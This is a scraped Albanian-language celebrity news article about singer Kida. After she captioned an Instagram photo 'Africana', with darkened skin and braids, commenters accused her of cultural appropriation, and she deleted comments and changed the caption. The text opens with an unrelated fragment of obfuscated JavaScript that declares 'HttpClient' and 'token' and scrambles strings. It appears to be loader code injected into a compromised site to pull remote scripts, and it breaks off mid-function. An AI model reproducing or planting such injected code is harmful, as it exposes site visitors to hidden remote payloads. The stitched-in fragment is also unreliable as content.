;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Pas postimit të fundit interneti e vërshon me kritika, kështu reagon Kida

By

Ditën e djeshme Kida postoi foto në Instagram, ku shihet shum e nxirë dhe me flokë të thurrura dhe mbishkrimin Africana.

E pikërisht, termi Africana ishte ajo që nxiti një debat në seksionin e komenteve, një debat i cili është aktual në gjithë botën, Cultural Appropriation ose në gjuhën shqipe Përvetësim kulturor.

Përvetësimi kulturor është akti i adoptimit të elementeve të kulturës së jashtme, shpesh të pakicës, duke përfshirë njohuritë, praktikat dhe simbolet, pa kuptuar ose respektuar kulturën dhe kontekstin origjinal. E në rastin e Kidës, teni më i erret i lëkurës dhe flokët gërsheta, janë përvetësim ofendues për kulturën afrikane, kur përdoren jashtë çdo konteksti.

Ky debat ose çështje, është ende e panjohur për shumicën e shoqërisë kosovare, po për një fytyrë publike e që duhet të jetë e kujdesshme, komente të shumta vërshuan në postimin e këngëtares, duke kritikuar atë.

“Ky është përvetësim kulturor dhe shumë ofenduese për komunitetin afrikan. Duhet të bësh më mirë!” – shkruan një komentues.

“Të lutem largoje këtë postim…nëse nuk e kupton sa ofenduese është kjo, largohu nga rrjetet sociale. Seriozisht sa herë duhet të bëjmë këtë bisedë? Kjo nuk është në rregull!” – shkruan një komentues në këtë postim.

“Afrikane e? Kur do ndalojnë shqiptarët me përvetësimin kulturor dhe përdorimin e kulturave thjesht për estetikë?”

“Problemi është që njerëzit me ngjyrë diskriminohen në vendin e punës kur mbajnë flokët të stiluar sipas origjinës dhe traditave, por kur e bën një vajzë e bardhë kjo gjë është në rregull? Në djall shkoftë kjo. Rregulloni racizmin dhe diskriminimin si fillim dhe pastaj përdorni kulturat e njerëzve të tjerë për bukuri, pa i ditur sfidat e tyre thjesht sepse janë me ngjyrë.”

Këto më lartë ishin mendimet e vetëm nga disa komentuesve, sepse një tjetër çështje që acaroi komentuesit, ishte fakti që Kida fshiu shumicën e këtyre komenteve duke mos ju adresuar në asnjë mënyrë.

Në Twitter poashtu u zhvendos ky debat ku njëra @norruh shkruan:

“Kida fshiu komentin tim dhe ndërroi mbishkrimin e fotos.”

Kida pas të gjithë debatit, zgjodhi të fshij aq komente sa mundi, dhe u mundua që të shuante debatin vetëm duke ndërruar mbishkrimin e fotos. Një deklaratë e saj ende nuk është bërë publike pas gjithë ngjarjes së djeshme. /Prive.al

View this post on Instagram

@vesagashi_mua @gurigashi 📸💛

A post shared by KIDA (@kida) on

 

 

 

 

 

Artikuj të ngjashëm